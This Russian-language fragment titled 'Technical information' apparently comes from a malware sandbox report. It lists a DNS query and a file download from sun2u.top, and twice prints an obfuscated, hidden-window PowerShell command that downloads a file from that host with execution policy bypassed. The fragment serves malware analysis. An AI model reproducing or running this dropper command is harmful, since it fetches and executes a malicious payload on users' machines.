Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWerSHe^L^l.EXe^ -E^xe^cuTI^oNP^O^lIcy By^pA^s^S -nOpr^OF^i^LE^ ^-WiNDows^Ty^le^ hiD^deN^ (nEw^-ob^JE^CT sY^s^teM.n^et.^weBCLi^ENt).d^oWnLo^AD^f^ilE^('http://sun2u.top/search...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /C "p^OWerSHe^L^l.EXe^ -E^xe^cuTI^oNP^O^lIcy By^pA^s^S -nOpr^OF^i^LE^ ^-WiNDows^Ty^le^ hiD^deN^ (nEw^-ob^JE^CT sY^s^teM.n^et.^weBCLi^ENt).d^oWnLo^AD^f^ilE^('http://sun2u.top/search...' (со скрытым окном)